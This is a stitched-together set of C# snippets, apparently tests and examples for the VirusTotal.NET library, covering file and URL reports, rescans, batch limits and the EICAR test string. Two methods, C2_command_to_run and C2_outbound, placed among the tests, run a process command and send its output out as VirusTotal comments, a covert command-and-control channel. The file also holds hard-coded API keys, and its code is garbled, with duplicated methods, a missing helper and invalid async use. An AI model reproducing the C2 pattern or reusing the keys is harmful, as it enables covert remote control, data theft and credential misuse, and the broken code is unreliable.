public async Task GetIPReportUnknownIPv4()
{
//Unknown hosts do not have all this in the response
IgnoreMissingJson(" / as_owner", " / ASN", " / Country", " / detected_communicating_samples", " / detected_downloaded_samples", " / detected_referrer_samples", " / detected_urls", " / Resolutions", " / undetected_communicating_samples", " / undetected_downloaded_samples", " / undetected_referrer_samples");
IPReport report = await VirusTotal.GetIPReportAsync("128.168.238.14");
Assert.Equal(IPReportResponseCode.NotPresent, report.ResponseCode);
}
public async Task UrlScanBatchLimit()
{
VirusTotal.RestrictNumberOfResources = false;
IEnumerable <UrlScanResult> results = await VirusTotal.ScanUrlsAsync(TestData.GetUnknownUrls(50));
//We only expect 25 as VT simply returns 25 results no matter the batch size.
Assert.Equal(VirusTotal.UrlScanBatchSizeLimit, results.Count());
}
public async Task RescanUnknownFile()
{
IgnoreMissingJson(" / Permalink", " / scan_id", " / SHA256");
RescanResult fileResult = await VirusTotal.RescanFileAsync(TestData.GetRandomSHA1s(1).First());
//It should not be in the VirusTotal database already, which means it should return error.
Assert.Equal(RescanResponseCode.ResourceNotFound, fileResult.ResponseCode);
}
public async Task GetDomainReportUnknownDomain()
{
//Reports don't contain all these fields when it is unknown
IgnoreMissingJson(" / Alexa category", " / Alexa domain info", " / Alexa rank", " / BitDefender category", " / BitDefender domain info", " / Categories", " / detected_communicating_samples", " / detected_downloaded_samples", " / detected_referrer_samples", " / detected_urls", " / domain_siblings", " / Dr.Web category", " / Forcepoint ThreatSeeker category", " / Opera domain info", " / Pcaps", " / Resolutions", " / subdomains", " / TrendMicro category", " / undetected_communicating_samples", " / undetected_downloaded_samples", " / undetected_referrer_samples", " / Websense ThreatSeeker category", " / Webutation domain info", " / whois", " / whois_timestamp", " / WOT domain info");
DomainReport report = await VirusTotal.GetDomainReportAsync(TestData.GetUnknownDomains(1).First());
Assert.Equal(DomainResponseCode.NotPresent, report.ResponseCode);
}
public async Task ScanMultipleUnknownUrl()
{
IEnumerable <UrlScanResult> urlScans = await VirusTotal.ScanUrlsAsync(TestData.GetUnknownUrls(5));
foreach (UrlScanResult urlScan in urlScans)
{
Assert.Equal(UrlScanResponseCode.Queued, urlScan.ResponseCode);
}
}
public async Task RescanMultipleKnownFile()
{
IEnumerable <RescanResult> fileResult = await VirusTotal.RescanFilesAsync(TestData.KnownHashes);
foreach (RescanResult rescanResult in fileResult)
{
//It should always be in the VirusTotal database. We expect it to rescan it
Assert.Equal(RescanResponseCode.Queued, rescanResult.ResponseCode);
}
}
public async Task GetReportForUnknownFile()
{
//Reports for unknown files do not have these fields
IgnoreMissingJson(" / MD5", " / Permalink", " / Positives", " / scan_date", " / scan_id", " / Scans", " / SHA1", " / SHA256", " / Total");
FileReport fileReport = await VirusTotal.GetFileReportAsync(TestData.GetRandomSHA1s(1).First());
//It should not be in the VirusTotal database already, which means it should return error.
Assert.Equal(FileReportResponseCode.NotPresent, fileReport.ResponseCode);
}
public async Task GetReportForUnknownUrlAndScan()
{
UrlReport urlReport = await VirusTotal.GetUrlReport("VirusTotal.NET" + Guid.NewGuid() + ".com", true);
//It return "present" because we told it to scan it
Assert.Equal(ReportResponseCode.Present, urlReport.ResponseCode);
//We are supposed to have a scan id because we scanned it
Assert.False(string.IsNullOrWhiteSpace(urlReport.ScanId));
}
public static FileReport UploadToVirusTotal(string APIKEY)
{
VirusTotal virusTotal = new VirusTotal(APIKEY);
virusTotal.UseTLS = true;
byte[] eicar = Encoding.ASCII.GetBytes(@"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*");
FileReport report = await virusTotal.GetFileReportAsync(eicar);
return(report);
}
public async Task CreateDuplicateComment()
{
//Create the comment. This might fail with an error, but it does not matter.
await VirusTotal.CreateCommentAsync(TestData.TestHash, "VirusTotal.NET test");
CreateCommentResult comment = await VirusTotal.CreateCommentAsync(TestData.TestHash, "VirusTotal.NET test");
Assert.Equal(CommentResponseCode.Error, comment.ResponseCode);
Assert.Equal("Duplicate comment", comment.VerboseMsg);
}
public async Task GetReportForKnownFile()
{
//Create a hash of the EICAR test virus. See http://www.eicar.org/86-0-Intended-use.html
string hash = HashHelper.GetMD5(@"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*");
FileReport fileReport = await VirusTotal.GetFileReport(hash);
//It should always be in the VirusTotal database.
Assert.Equal(ReportResponseCode.Present, fileReport.ResponseCode);
}
public async Task C2_command_to_run(string api_key, string sha1, string process_filename, string process_command)
{
VirusTotal virusTotal = new VirusTotal(sha1);
virusTotal.UseTLS = true;
string run = Perform_C2(process_filename, process_command);
await C2_outbound(api_key, sha1, run);
}
public async Task GetMultipleReportForKnownFiles()
{
IEnumerable <FileReport> results = await VirusTotal.GetFileReportsAsync(TestData.KnownHashes);
foreach (FileReport fileReport in results)
{
//It should always be in the VirusTotal database.
Assert.Equal(FileReportResponseCode.Present, fileReport.ResponseCode);
}
}
//FileInfo fileInfo = new FileInfo("C:\\Users\\Antonio\\Documents\\file.txt");
public List <VirusTotalAux> send()
{
_virusTotal = new VirusTotal(ConfigurationManager.AppSettings["ApiKey"]);
_listaScan.Clear();
_listaResultados.Clear();
int count = 0;
while (count < 2)
{
string ruta = _lista[count].Proceso;
ruta = ruta.Replace(@"\", @"\\");
FileInfo fileInfo = new FileInfo(ruta);
_virusTotal.UseTLS = true;
FileReport fileReport = _virusTotal.GetFileReport(fileInfo);
bool hasFileBeenScannedBefore = fileReport.ResponseCode == ReportResponseCode.Present;
if (hasFileBeenScannedBefore)
{
VirusTotalAux aux = new VirusTotalAux {
Nombre = fileInfo.Name, Mensaje = fileReport.VerboseMsg, Positivos = fileReport.Positives.ToString() + "/" + fileReport.Total.ToString(), ScanDate = fileReport.ScanDate.ToString()
};
foreach (ScanEngine scan in fileReport.Scans)
{
VirusTotalResultAux aux2 = new VirusTotalResultAux {
Antivirus = scan.Name, Infectado = scan.Detected, Virus = scan.Result
};
_listaResultados.Add(aux2);
}
aux.resultados = _listaResultados;
_listaScan.Add(aux);
//PrintScan(fileReport);
}
else
{
ScanResult fileResult = _virusTotal.ScanFile(fileInfo);
VirusTotalAux aux = new VirusTotalAux {
Mensaje = fileResult.VerboseMsg
};
aux.resultados = _listaResultados;
//Console.WriteLine(fileResult.VerboseMsg);
//PrintScan(fileResult);
}
count++;
}
return(_listaScan);
}
public async Task RescanBatchLimit()
{
IgnoreMissingJson("[array] / Permalink", "[array] / scan_id", "[array] / SHA256");
VirusTotal.RestrictNumberOfResources = false;
IEnumerable <RescanResult> results = await VirusTotal.RescanFilesAsync(TestData.GetRandomSHA1s(50));
//We only expect 25 as VT simply returns 25 results no matter the batch size.
Assert.Equal(VirusTotal.RescanBatchSizeLimit, results.Count());
}
public async Task RescanLargeFile()
{
IgnoreMissingJson(" / Permalink", " / scan_id", " / SHA256");
//Since rescan works on hashes, we expect the hash of this empty file (which is larger than the limit) is not present in the database.
byte[] bytes = new byte[99 * 1023 * 1024]; //the weird size is because VT has some weird empty files in its database.
string hash = HashHelper.GetMD5(bytes);
RescanResult result = await VirusTotal.RescanFile(hash);
Assert.Equal(ScanResponseCode.Error, result.ResponseCode);
}
public async Task ScanMultipleUnknownUrl()
{
string[] urls = { "VirusTotal.NET" + Guid.NewGuid() + ".com", "VirusTotal.NET" + Guid.NewGuid() + ".com", "VirusTotal.NET" + Guid.NewGuid() + ".com", "VirusTotal.NET" + Guid.NewGuid() + ".com", "VirusTotal.NET" + Guid.NewGuid() + ".com" };
List <UrlScanResult> urlScans = await VirusTotal.ScanUrls(urls);
foreach (UrlScanResult urlScan in urlScans)
{
Assert.Equal(ScanResponseCode.Queued, urlScan.ResponseCode);
}
}
public async Task GetMultipleReportUnknownUrl()
{
string[] urls = { "VirusTotal.NET" + Guid.NewGuid() + ".com", "VirusTotal.NET" + Guid.NewGuid() + ".com", "VirusTotal.NET" + Guid.NewGuid() + ".com" };
List <UrlReport> urlReports = await VirusTotal.GetUrlReports(urls);
foreach (UrlReport urlReport in urlReports)
{
Assert.Equal(ReportResponseCode.NotPresent, urlReport.ResponseCode);
}
}
public async Task C2_outbound(string api_key, string sha1, string upload_to_vt)
{
VirusTotal virusTotal = new VirusTotal(api_key);
virusTotal.UseTLS = true;
CreateCommentResult comment = await virusTotal.CreateCommentAsync(sha1, upload_to_vt);
Assert.Equal(CommentResponseCode.Error, comment.ResponseCode);
}
public async Task GetReportUnknownUrl()
{
IgnoreMissingJson(" / filescan_id", " / Permalink", " / Positives", " / scan_date", " / scan_id", " / Scans", " / Total", " / URL");
UrlReport urlReport = await VirusTotal.GetUrlReportAsync(TestData.GetUnknownUrls(1).First());
Assert.Equal(UrlReportResponseCode.NotPresent, urlReport.ResponseCode);
//We are not supposed to have a scan id
Assert.True(string.IsNullOrWhiteSpace(urlReport.ScanId));
}
public async Task UrlReportBatchLimit()
{
IgnoreMissingJson("[array] / filescan_id", "[array] / Permalink", "[array] / Positives", "[array] / scan_date", "[array] / scan_id", "[array] / Scans", "[array] / Total", "[array] / URL");
VirusTotal.RestrictNumberOfResources = false;
IEnumerable <UrlReport> results = await VirusTotal.GetUrlReportsAsync(TestData.GetUnknownUrls(5));
//We only expect 4 as VT simply returns 4 results no matter the batch size.
Assert.Equal(VirusTotal.UrlReportBatchSizeLimit, results.Count());
}
public async Task GetMultipleReportUnknownUrl()
{
IgnoreMissingJson("[array] / filescan_id", "[array] / Permalink", "[array] / Positives", "[array] / scan_date", "[array] / scan_id", "[array] / Scans", "[array] / Total", "[array] / URL");
IEnumerable <UrlReport> urlReports = await VirusTotal.GetUrlReportsAsync(TestData.GetUnknownUrls(4));
foreach (UrlReport urlReport in urlReports)
{
Assert.Equal(UrlReportResponseCode.NotPresent, urlReport.ResponseCode);
}
}
public async Task GetMultipleReportKnownUrl()
{
IgnoreMissingJson("[array].scans.ADMINUSLabs / Detail", "[array].scans.AlienVault / Detail", "[array].scans.Antiy-AVL / Detail", "[array].scans.AutoShun / Detail", "[array].scans.Avira / Detail", "[array].scans.Baidu-International / Detail", "[array].scans.BitDefender / Detail", "[array].scans.Blueliv / Detail", "[array].scans.Certly / Detail", "[array].scans.C-SIRT / Detail", "[array].scans.CyberCrime / Detail", "[array].scans.Emsisoft / Detail", "[array].scans.ESET / Detail", "[array].scans.Fortinet / Detail", "[array].scans.FraudScore / Detail", "[array].scans.FraudSense / Detail", "[array].scans.G-Data / Detail", "[array].scans.K7AntiVirus / Detail", "[array].scans.Kaspersky / Detail", "[array].scans.Malekal / Detail", "[array].scans.Malwared / Detail", "[array].scans.MalwarePatrol / Detail", "[array].scans.Netcraft / Detail", "[array].scans.Nucleon / Detail", "[array].scans.OpenPhish / Detail", "[array].scans.Opera / Detail", "[array].scans.ParetoLogic / Detail", "[array].scans.PhishLabs / Detail", "[array].scans.Phishtank / Detail", "[array].scans.Quttera / Detail", "[array].scans.Rising / Detail", "[array].scans.SecureBrain / Detail", "[array].scans.securolytics / Detail", "[array].scans.Sophos / Detail", "[array].scans.Spam404 / Detail", "[array].scans.StopBadware / Detail", "[array].scans.Tencent / Detail", "[array].scans.ThreatHive / Detail", "[array].scans.Trustwave / Detail", "[array].scans.URLQuery / Detail", "[array].scans.Webutation / Detail", "[array].scans.ZCloudsec / Detail", "[array].scans.ZeroCERT / Detail", "[array].scans.Zerofox / Detail", "[array].scans.zvelo / Detail", "[array].scans['AegisLab WebGuard'] / Detail", "[array].scans['CLEAN MX'] / Detail", "[array].scans['Comodo Site Inspector'] / Detail", "[array].scans['desenmascara.me'] / Detail", "[array].scans['Dr.Web'] / Detail", "[array].scans['Forcepoint ThreatSeeker'] / Detail", "[array].scans['Google Safebrowsing'] / Detail", "[array].scans['Malware Domain Blocklist'] / Detail", "[array].scans['Malwarebytes hpHosts'] / Detail", "[array].scans['malwares.com URL checker'] / Detail", "[array].scans['SCUMWARE.org'] / Detail", "[array].scans['Sucuri SiteCheck'] / Detail", "[array].scans['Virusdie External Site Scan'] / Detail", "[array].scans['VX Vault'] / Detail", "[array].scans['Web Security Guard'] / Detail", "[array].scans['ZDB Zeus'] / Detail");
IEnumerable <UrlReport> urlReports = await VirusTotal.GetUrlReportsAsync(TestData.KnownUrls);
foreach (UrlReport urlReport in urlReports)
{
Assert.Equal(UrlReportResponseCode.Present, urlReport.ResponseCode);
}
}
public async Task ScanMultipleKnownUrls()
{
string[] urls = { "google.se", "http://google.com", "https://virustotal.com" };
List <UrlScanResult> urlScans = await VirusTotal.ScanUrls(urls);
foreach (UrlScanResult urlScan in urlScans)
{
Assert.Equal(ScanResponseCode.Queued, urlScan.ResponseCode);
}
}
public async Task GetMultipleReportKnownUrl()
{
string[] urls = { "google.se", "http://google.com", "https://virustotal.com" };
List <UrlReport> urlReports = await VirusTotal.GetUrlReports(urls);
foreach (UrlReport urlReport in urlReports)
{
Assert.Equal(ReportResponseCode.Present, urlReport.ResponseCode);
}
}
public async Task FileReportBatchLimit()
{
IgnoreMissingJson("[array] / MD5", "[array] / Permalink", "[array] / Positives", "[array] / scan_date", "[array] / scan_id", "[array] / Scans", "[array] / SHA1", "[array] / SHA256", "[array] / Total");
VirusTotal.RestrictNumberOfResources = false;
IEnumerable <FileReport> results = await VirusTotal.GetFileReportsAsync(TestData.GetRandomSHA1s(10));
//We only expect 4 as VT simply returns 4 results no matter the batch size.
Assert.Equal(VirusTotal.FileReportBatchSizeLimit, results.Count());
}
public async void GetReportForRecentFile()
{
//We ignore these fields due to unknown file
IgnoreMissingJson(" / MD5", " / Permalink", " / Positives", " / scan_date", " / Scans", " / SHA1", " / SHA256", " / Total");
ScanResult result = await VirusTotal.ScanFileAsync(TestData.GetRandomFile(128, 1).First(), TestData.TestFileName);
FileReport fileReport = await VirusTotal.GetFileReportAsync(result.ScanId);
Assert.Equal(FileReportResponseCode.Queued, fileReport.ResponseCode);
}
public async Task GetReportForUnknownUrlAndScan()
{
IgnoreMissingJson(" / filescan_id", " / Positives", " / Scans", " / Total");
UrlReport urlReport = await VirusTotal.GetUrlReportAsync(TestData.GetUnknownUrls(1).First(), true);
//It return "present" because we told it to scan it
Assert.Equal(UrlReportResponseCode.Present, urlReport.ResponseCode);
//We are supposed to have a scan id because we scanned it
Assert.False(string.IsNullOrWhiteSpace(urlReport.ScanId));
}
protected TestBase()
{
_ignoreMissingJson = new List<string>();
_ignoreMissingCSharp = new List<string>();
JsonSerializerSettings settings = new JsonSerializerSettings();
settings.MissingMemberHandling = MissingMemberHandling.Error;
settings.ContractResolver = new FailingContractResolver();
settings.Error = Error;
VirusTotal = new VirusTotal("YOUR API KEY HERE", settings);
}
public VirusTotalHandle(string API_KEY, Action <HttpRequestMessage> sendHandler,
Action <HttpResponseMessage> responseHandler, Action <byte[]> rawResponseHandler, bool useTLS)
{
handle = new VirusTotal(API_KEY);
handle.UseTLS = useTLS;
onRequestSending = sendHandler;
onResponseRecieved = responseHandler;
onRawResponseRecieved = rawResponseHandler;
handle.OnHTTPRequestSending += onRequestSending;
handle.OnHTTPResponseReceived += onResponseRecieved;
handle.OnRawResponseReceived += onRawResponseRecieved;
}
public async Task RescanKnownFile()
{
//Create the EICAR test virus. See http://www.eicar.org/86-0-Intended-use.html
FileInfo fileInfo = new FileInfo("EICAR.txt");
File.WriteAllText(fileInfo.FullName, @"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*");
RescanResult fileResult = await VirusTotal.RescanFile(fileInfo);
//It should always be in the VirusTotal database. We expect it to rescan it
Assert.Equal(ScanResponseCode.Queued, fileResult.ResponseCode);
}
static void Main(string[] args)
{
VirusTotal virusTotal = new VirusTotal(ConfigurationManager.AppSettings["ApiKey"]);
//Use HTTPS instead of HTTP
virusTotal.UseTLS = true;
//Create the EICAR test virus. See http://www.eicar.org/86-0-Intended-use.html
FileInfo fileInfo = new FileInfo("EICAR.txt");
File.WriteAllText(fileInfo.FullName, @"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*");
//Check if the file has been scanned before.
FileReport fileReport = virusTotal.GetFileReport(fileInfo);
bool hasFileBeenScannedBefore = fileReport.ResponseCode == ReportResponseCode.Present;
Console.WriteLine("File has been scanned before: " + (hasFileBeenScannedBefore ? "Yes" : "No"));
//If the file has been scanned before, the results are embedded inside the report.
if (hasFileBeenScannedBefore)
{
PrintScan(fileReport);
}
else
{
ScanResult fileResult = virusTotal.ScanFile(fileInfo);
PrintScan(fileResult);
}
Console.WriteLine();
UrlReport urlReport = virusTotal.GetUrlReport(ScanUrl);
bool hasUrlBeenScannedBefore = urlReport.ResponseCode == ReportResponseCode.Present;
Console.WriteLine("URL has been scanned before: " + (hasUrlBeenScannedBefore ? "Yes" : "No"));
//If the url has been scanned before, the results are embedded inside the report.
if (hasUrlBeenScannedBefore)
{
PrintScan(urlReport);
}
else
{
ScanResult urlResult = virusTotal.ScanUrl(ScanUrl);
PrintScan(urlResult);
}
Console.WriteLine("Press a key to continue");
Console.ReadLine();
}
private static async Task RunExample()
{
VirusTotal virusTotal = new VirusTotal("YOUR API KEY HERE");
//Use HTTPS instead of HTTP
virusTotal.UseTLS = true;
//Create the EICAR test virus. See http://www.eicar.org/86-0-Intended-use.html
FileInfo fileInfo = new FileInfo("EICAR.txt");
File.WriteAllText(fileInfo.FullName, @"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*");
//Check if the file has been scanned before.
FileReport fileReport = await virusTotal.GetFileReport(fileInfo);
bool hasFileBeenScannedBefore = fileReport.ResponseCode == ReportResponseCode.Present;
Console.WriteLine("File has been scanned before: " + (hasFileBeenScannedBefore ? "Yes" : "No"));
//If the file has been scanned before, the results are embedded inside the report.
if (hasFileBeenScannedBefore)
{
PrintScan(fileReport);
}
else
{
ScanResult fileResult = await virusTotal.ScanFile(fileInfo);
PrintScan(fileResult);
}
Console.WriteLine();
UrlReport urlReport = await virusTotal.GetUrlReport(ScanUrl);
bool hasUrlBeenScannedBefore = urlReport.ResponseCode == ReportResponseCode.Present;
Console.WriteLine("URL has been scanned before: " + (hasUrlBeenScannedBefore ? "Yes" : "No"));
//If the url has been scanned before, the results are embedded inside the report.
if (hasUrlBeenScannedBefore)
{
PrintScan(urlReport);
}
else
{
UrlScanResult urlResult = await virusTotal.ScanUrl(ScanUrl);
PrintScan(urlResult);
}
}
private void iTalk_Button_22_Click(object sender, EventArgs e)
{
// initializing VT with API key
VirusTotal VT = new VirusTotal("c9836f1fb3196ec1205c4eb4f58cc50be1b41915f2b18633927e8a7333457cc8");
// Yes we want to use HTTPS instead of HTTP
VT.UseTLS = true;
// Getting our file
FileInfo fileInfo = new FileInfo("asdf.txt"/*iTalk_TextBox_Small2.Text*/);
//debug purpose
File.WriteAllText(fileInfo.FullName, @"purpletestfislekkkk");
// Getting our fileReport
FileReport fileReport = VT.GetFileReport(fileInfo);
// Checking weather or not there is a previous scan on the file
bool prevScan = fileReport.ResponseCode == ReportResponseCode.Present;
// If there was a previous scan or if prevScan = true ( its a bool )
// Update our label to let the users know there is a pervious scan
// else
// We want to upload the file and get the scan report
// ( this is where PrintScan(ScanResult scanresult) comes into play )
if (prevScan)
{
PrintScan(fileReport);
iTalk_Label7.Text = "YES";
iTalk_Label7.ForeColor = Color.Green;
}
else
{
ScanResult fileReport2 = VT.ScanFile(fileInfo);
PrintScan(fileReport2);
iTalk_Label7.Text = "NO";
iTalk_Label7.ForeColor = Color.Red;
}
}
public static void scanFile(string fnPath, ScannedFileItem _scannedFile)
{
try {
if (File.Exists(fnPath)) {
_scanW.WorkerReportsProgress = true;
_scanW.WorkerSupportsCancellation = true;
_scanW.RunWorkerAsync();
_scanW.DoWork += (o, e) => {
var virusTotal = new VirusTotal(apiKey);
virusTotal.UseTLS = true;
var fInfo = new FileInfo(fnPath);
_report = new FileReport();
var fReport = virusTotal.GetFileReport(fInfo);
_report = fReport;
bool hasFileBeenScannedBefore = fReport.ResponseCode == ReportResponseCode.Present;
if (!hasFileBeenScannedBefore) {
var fResult = virusTotal.ScanFile(fInfo);
}
};
_scanW.RunWorkerCompleted += (m, e) => {
if (_report != null) {
var scanWin = new ScanResultWin();
scanWin.init(_report, _scannedFile);
scanWin.ShowDialog();
}
};
}
}
catch (Exception ex) {
GeneralSettings.LogException(ex);
}
}
public static void Initialize(TestContext context)
{
_virusTotal = new VirusTotal(ConfigurationManager.AppSettings["ApiKey"]);
}
public void UnauthorizedScan()
{
VirusTotal virusTotal = new VirusTotal("xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"); //64 characters
virusTotal.GetFileReport("ca6d91bad9d5d5698c92dc64295a15a6"); //conficker MD5 hash
}
public async Task UnauthorizedScan()
{
VirusTotal virusTotal = new VirusTotal("xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"); //64 characters
await Assert.ThrowsAsync<AccessDeniedException>(async () => await virusTotal.GetFileReport("ca6d91bad9d5d5698c92dc64295a15a6")); //conficker MD5 hash
}
private static void VirusScanFile(string filePath)
{
VirusTotal virusTotal = new VirusTotal("555e487a82c5885d48c50f33037393f2f3140db9f5e0b256eb30e5654f601486");
virusTotal.UseTLS = true;
FileInfo fileInfo = new FileInfo(filePath);
if (!fileInfo.Exists)
return;
//Check if the file has been scanned before.
Debug.WriteLine("Getting report for " + Path.GetFileName(filePath));
Report report = virusTotal.GetFileReport(fileInfo);
if (report == null || report.ResponseCode == 0)
{
Debug.WriteLine("No report for " + Path.GetFileName(filePath) + " - sending file to VT");
try
{
ScanResult result = virusTotal.ScanFile(fileInfo);
Debug.WriteLine("Opening report for " + Path.GetFileName(filePath));
Process.Start(result.Permalink);
}
catch (RateLimitException)
{
MessageBox.Show("Virus Total limits the number of calls you can make to 4 calls each 60 seconds.", "Rate limit");
}
catch (SizeLimitException)
{
MessageBox.Show("Virus Total limits the filesize to 32 MB.", "File too large");
}
}
else
{
Debug.WriteLine("Opening report for " + Path.GetFileName(filePath));
Process.Start(report.Permalink);
}
}
